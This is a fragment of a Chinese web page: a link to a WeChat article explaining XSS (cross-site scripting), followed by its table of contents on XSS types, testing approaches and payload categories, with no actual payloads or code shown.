href="https://mp.weixin.qq.com/s?__biz=MzI2NDQyNzg1OA==&mid=2247483698&idx=1&sn=cebb6e5c01f4e6a72860f13c5e5ea4f5&chksm=eaad810fddda08195f9afdfd4ead758bc3de3a1aa5bc71b169d2599383b51b431218ac19142d&scene=21#wechat_redirect">XSS（跨站脚本）详解</a></p>

XSS

定义

反射型XSS

存储型XSS

DOM型XSS

XSS 特征

XSS与CSRF的区别（面试常问）

XSS 攻击面

黑盒测试

常见业务场景

白盒测试(代码审计)

XSS 相关payload

标签类

script

svg

img

body

video

style

表单类

事件类

鼠标事件

键盘事件

框架/对象（Frame/Object）事件

表单事件